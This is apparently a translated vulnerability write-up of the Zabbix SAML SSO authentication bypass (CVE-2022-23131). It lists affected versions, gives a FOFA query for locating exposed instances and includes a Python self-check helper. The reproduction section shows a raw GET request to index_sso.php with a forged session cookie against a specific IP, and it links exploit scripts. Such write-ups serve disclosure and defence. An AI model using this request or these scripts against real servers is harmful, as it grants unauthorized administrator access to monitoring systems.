0x01 Vulnerability description
Zabbix stores the session cookie submitted by the client in an unsafe way. When SAML SSO authentication is enabled, a malicious user can bypass authentication by constructing a special request and obtain administrator privileges.
0x02 Affected versions
5.4.0 - 5.4.8
6.0.0alpha1
0x03 FOFA query
app="ZABBIX-监控系统" && body="saml"
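An added self-assessment helper (not part of the original writeup or of any referenced script) that ties the affected-version list above to the SAML indicator used in the FOFA query: it parses a Zabbix version string, including the 6.0.0alpha1 pre-release form, and checks a saved copy of your own instance's login page for the index_sso.php SAML link. The login-page markup is a constructed sample and the index_sso.php check is an assumption.

```python
import re

# Affected versions exactly as listed in this writeup (inclusive range + one pre-release).
AFFECTED_RANGES = [((5, 4, 0), (5, 4, 8))]
AFFECTED_PRERELEASES = {"6.0.0alpha1"}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(alpha|beta|rc)?(\d+)?$")


def parse_version(version: str):
    """Split '5.4.8' or '6.0.0alpha1' into (major, minor, patch, stage, number).
    stage is None for a final release."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Zabbix version string: {version!r}")
    major, minor, patch, stage, number = m.groups()
    return int(major), int(minor), int(patch), stage, int(number) if number else 0


def is_affected_version(version: str) -> bool:
    major, minor, patch, stage, _ = parse_version(version)
    if stage is None:
        return any(lo <= (major, minor, patch) <= hi for lo, hi in AFFECTED_RANGES)
    # Pre-releases are matched only against the names the writeup lists, so a
    # later 6.0.0 beta/rc is reported as not listed rather than guessed at.
    return version.strip() in AFFECTED_PRERELEASES


def saml_login_enabled(login_page_html: str) -> bool:
    """Assumption: a Zabbix login page with SAML enabled links to index_sso.php,
    the endpoint the reproduction request above is sent to."""
    return "index_sso.php" in login_page_html


def assess(version: str, login_page_html: str) -> dict:
    """Exposure requires both an affected version and SAML SSO being enabled."""
    affected = is_affected_version(version)
    saml = saml_login_enabled(login_page_html)
    return {"version_affected": affected, "saml_enabled": saml, "exposed": affected and saml}


# Constructed sample of a login page fragment with the SAML link present.
SAMPLE_LOGIN_HTML = '<form action="index.php"></form><a href="index_sso.php">Sign in with Single Sign-On (SAML)</a>'

if __name__ == "__main__":
    print(assess("5.4.6", SAMPLE_LOGIN_HTML))
```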
0x04 Vulnerability reproduction
Request the endpoint to obtain a session:
http://IP/
Put the session into the cookie; the request is then redirected successfully to zabbix.php?action=dashboard.view
GET /index_sso.php HTTP/1.1
Host: 138.68.159.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, houzidiandian) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: close
Cookie: zbx_session=xxxx
The cookie can be replaced with a browser extension, after which the backend can be logged into.
http://IP/zabbix.php?action=dashboard.view
Script verification
Script URL: https://raw.githubusercontent.com/ad-calcium/vuln_script/main/CVE-2022-23131.py
0x05 References
https://github.com/jweny/zabbix-saml-bypass-exp
https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw